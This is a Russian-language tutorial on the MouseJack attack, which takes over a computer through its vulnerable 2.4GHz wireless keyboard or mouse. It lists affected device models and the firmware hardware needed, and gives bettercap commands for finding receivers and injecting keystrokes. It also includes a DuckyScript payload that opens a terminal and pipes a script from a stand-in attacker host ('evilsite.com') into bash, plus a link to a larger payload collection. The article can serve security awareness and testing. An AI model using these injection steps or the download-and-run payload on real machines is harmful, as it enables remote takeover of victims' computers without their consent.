Взлом компьютера через беспроводную мышь или клавиатуру
Самый большой риск компрометации компьютера, с точки зрения информационной безопасности, возникает при непосредственном доступе к нему посторонних. При физическом доступе к компьютеру будет возможным скопировать информацию даже не зная пароля входа в систему. Также при непосредственном доступе можно скачать и запустить вредоносный файл (бэкдор) для скрытого управления компьютером.
Сейчас довольно популярны беспроводные HID устройства, работающие на 2.4Ghz: клавиатуры и мыши. При этом некоторые из них содержат уязвимости и подвержены атаке MouseJack. А это означает, что через подключённую к компьютеру беспроводную мышь или клавиатуру можно передавать сочетания клавиш и строки, что в свою очередь означает, что можно, к примеру, передать сочетания клавиш для открытия командной строки, ввести в неё любую команду и выполнить. Можно симулировать любые действия пользователя, которые он может выполнить с помощью клавиатуры и мыши.
Атака MouseJack
В Bettercap добавлен модуль HID on 2.4Ghz, который является реализацией атаки Bastille’s mousejack.
MouseJack — это класс уязвимостей, которые охватывают большое разнообразие беспроводных, не-Bluetooth клавиатур и компьютерных мышей. Эта периферия «подключена» к хостовому компьютеру с использованием радио передатчика, обычно маленького USB устройства. Поскольку подключение является беспроводным, и информация о перемещении мыши и нажатых клавишах передаётся по воздуху, то становится возможным скомпрометировать компьютер жертвы, передав специально составленный радио сигнал, это возможно сделать с помощью устройства ценой $15.
Атакующий может запустить атаку на расстоянии до 100 метров. Атакующий может взять под контроль целевой компьютер не находясь физически перед ним и печатать произвольный текст или отправлять скриптовые команды. Поэтому возможно быстро выполнять вредоносные действия, не будучи обнаруженными.
Эксплойт MouseJack сосредотачивается вокруг введения незашифрованных нажатий клавиш в целевой компьютер. Движения мыши обычно отправляются в незашифрованном виде, а нажатия клавиш часто шифруются (для предотвращения прослушивания набираемого текста). Однако уязвимость MouseJack использует уязвимые приёмные ключи и связанное с ними программное обеспечение, позволяя передавать незашифрованные нажатия клавиш, вводимые злоумышленником в операционную систему компьютера, как если бы сам пользователь компьютера печатал их сидя перед ним.
Кто уязвим?
В: У меня есть клавиатура/мышь Bluetooth. Я уязвим?
О: Не для MouseJack. Bluetooth использует совершенно другую систему передачи и шифрования, которая не подвержена этой атаке.
В: Сколько времени занимает взлом моего ноутбука с помощью MouseJack?
О: Компрометация с помощью MouseJack может произойти за считанные секунды. Не думайте, что злоумышленнику нужно несколько минут использовать клавиатуру/мышь, просматривая ваши интересные электронные письма. Примерно за десять секунд в ваш компьютер могут быть внесены изменения, чтобы злоумышленник мог удалённо скачивать документы, все ваши электронные письма, а также добавлять или удалять программы.
В: При каких условиях мой ноутбук уязвим?
О: Ваш ноутбук может быть «взломан» с расстояния до 100 метров. Вы можете быть в офисе, и посетитель взламывает вас на стойке регистрации, вы можете быть дома, и хакер атакует вас с улицы, вы можете быть в кафе, а другой клиент взламывает вас. Та же угроза существует в аэропорту, самолёте или во многих других ситуациях.
Итог: если ваш компьютер включён и подключён уязвимый приёмник радиосигналов, он может быть уязвим для MouseJack.
Устройства для сканирования и инъекции фреймов при атаках на HID устройства
Необходимо одно из следующих устройств, на которые установлена прошивка RFStorm:
-
CrazyRadio PA USB dongle
-
SparkFun nRF24LU1+ breakout board
-
Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)
Для успешного обнаружения и атаки на HID, необходимо убедиться, что установлена прошивка RFStorm на одно из перечисленных выше устройств.
После установки соответствующей прошивки и подключении к вашему компьютеру, dmesg будет сообщать об устройствах примерно следующее:
usb 3-1.3: new full-speed USB device number 8 using xhci_hcd usb 3-1.3: New USB device found, idVendor=1915, idProduct=0102 usb 3-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0 usb 3-1.3: Product: Research Firmware usb 3-1.3: Manufacturer: RFStorm
Уязвимые к атаке HID устройства на 2.4Ghz
Далее показана атака с использованием определённого железа и конкретной программы — для этой атаки составлен список подверженных устройств, про которые известны, что их возможно обнаружить и сделать инъекцию DuckyScript (полезной нагрузки, написанной на специальном скриптовом языке). Это не означает, что другие устройства не подвержены атаке HID, данный список составлен для указанных условий.
Итак, описанными ниже методами можно обнаружить и атаковать компьютеры, к которым подключено одно из следующих устройств:
- Microsoft Wireless Keyboard 800
- Microsoft Wireless Mouse 1000
- Microsoft Wireless Mobile Mouse 3500
- Microsoft All-In-One Media Keyboard
- Microsoft Sculpt Ergonomic Mouse
- Logitech Wireless Touch Keyboard K400r
- Logitech Marathon M705 Mouse
- Logitech Wave M510 Mouse
- Logitech Wireless Gaming Mouse G700s
- Logitech Wireless M325 Mouse
- Logitech K750 Wireless Keyboard
- Logitech K320 Wireless Keyboard
- Dell KM636 Wireless Mouse and Keyboard
- AmazonBasics MG-0975 Wireless Mouse
Программы для атаки на HID
Для поиска HID устройств и беспроводной инъекции подходит программа bettercap. Полезной нагрузкой будут скрипты DuckyScript.
Команды bettercap
Запуск сканирования HID устройств на частоте 2.4Ghz:
hid.recon on
Остановка сканирования HID устройств на частоте 2.4Ghz:
hid.recon off
Очистить список всех устройств, собранных с помощью модуля обнаружения HID:
hid.clear
Показать список собранных HID устройств на частоте 2.4Ghz:
hid.show
Начать сниффинг указанного АДРЕСА чтобы собрать полезные нагрузки, используйте «clear» для остановки сбора:
hid.sniff АДРЕС
Разбирает ФАЙЛ DuckyScript и внедряет его в HID фреймы используя спуфинг (подмену) АДРЕСА устройства, используя РАСКЛАДКУ клавиатуры (доступные раскладки: BE BR CA CH DE DK ES FI FR GB HR IT NO PT RU SI SV TR US):
hid.inject АДРЕС РАСКЛАДКА ФАЙЛ
Команда hid.inject не требует, чтобы HID устройство было предварительно обнаружено с помощью команды hid.show. Если вы уже знаете адрес приёмника беспроводного сигнала, вы можете просто установить параметр hid.force.type на один из ogitech (значение по умолчанию), amazon или microsoft и запустить инъекцию «вслепую».
Примеры выполнения атаки
Запуск bettercap:
sudo bettercap
1. С помощью модуля ticker настраивается регулярное обновление на экране информация о HID устройствах:
set ticker.commands clear; hid.show; events.show 10
Включение обнаружения HID:
hid.recon on
Включение модуля ticker:
ticker on
Ожидаем обнаружение устройства 32:26:9f:a4:08. Затем внедряем скрипт ducky.txt как HID фреймы, используя раскладку клавиатуры US:
hid.inject 32:26:9f:a4:08 US ducky.txt
2. Отправляем скрипт ducky.txt с нажатиями клавиш на приёмник с адресом 32:26:9f:a4:08, принудительно устанавливаем его тип на logitech, команды выполняются без ожидания обнаружения подключённого устройства:
set hid.force.type logitech hid.recon on hid.inject 32:26:9f:a4:08 US ducky.txt
Пример файла ducky.txt:
GUI SPACE DELAY 200 STRING Terminal ENTER DELAY 500 STRING curl -L http://www.evilsite.com/commands.sh | bash ENTER
Дополнительные примеры полезной нагрузки будут даны ниже, рассмотрим основы этого скриптового языка:
- DELAY x – Задержка в миллисекундах
- STRING abcdefghij – Напечатать следующие символы
- GUI – Кнопка меню Windows (также вызывает меню в Linux)
- GUI r – Окно запуска команды Windows
- COMMAND – Кнопка команд OSX
- UP | UPARROW – Стрелка вверх
- DOWN | DOWNARROW – Стрелка вниз
- LEFT | LEFTARROW – Стрелка влево
- RIGHT | RIGHTARROW – Стрелка вправо
- CAPS |CAPSLOCK – Кнопка Capslock
- ENTER – Кнопка Enter
- SPACE – Пробел
- REPEAT x – Повторить следующую команду X раз.
- CTRL ESC — На Windows 10, видимо, GUI не работает, поэтому в качестве альтернативы используйте это сочетание.
- CTRL ALT t — открывает терминал в Linux
- ALT F2 — Окно запуска команды на Linux. Для открытия настоящего терминала можно ввести «gnome-terminal» или «xterm».
Вы можете даже использовать некоторые (но не все) комбинации из двух и трёх клавиш:
- SHIFT-ENTER
- CTRL-ALT-DEL
- ALT-F4
Введение в Duckyscript (на английском).
Видео атаки
На видео показано, как программа обнаруживает 2 HID устройства и на одно из них отправляет команду, которая запускает программу на втором компьютере (открывает калькулятор).
Примеры полезной нагрузки для отправки на HID
Большая подборка скриптов эксплуатации беспроводных мышек и клавиатур: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Некоторые полезные нагрузки отсутствуют в этом перечне, но присутствуют в самой вики — поэтому смотрите также список страниц (в правой части экрана). Примеры отсутствующих в главном меню:
- Payload Information Gathering Ubuntu (сбор информации о Linux)
- Payload Basic Terminal Commands Ubuntu (выполнение команды в терминале Linux)
Связанные статьи:
- Как перевести беспроводную карту в режим монитора (контроля) в Kali Linux (50%)
- Как узнать, поддерживает ли беспроводная карта инжект (инъекцию) в Kali Linux (50%)
- Деаутентификация клиентов беспроводной сети в Kali Linux (50%)
- Захват рукопожатий (handshake) в Kali Linux (50%)
- Как узнать имя скрытой сети Wi-Fi (50%)
- Простой способ увеличить TX Power для Wi-Fi в Kali Linux и BlackArch (RANDOM - 50%)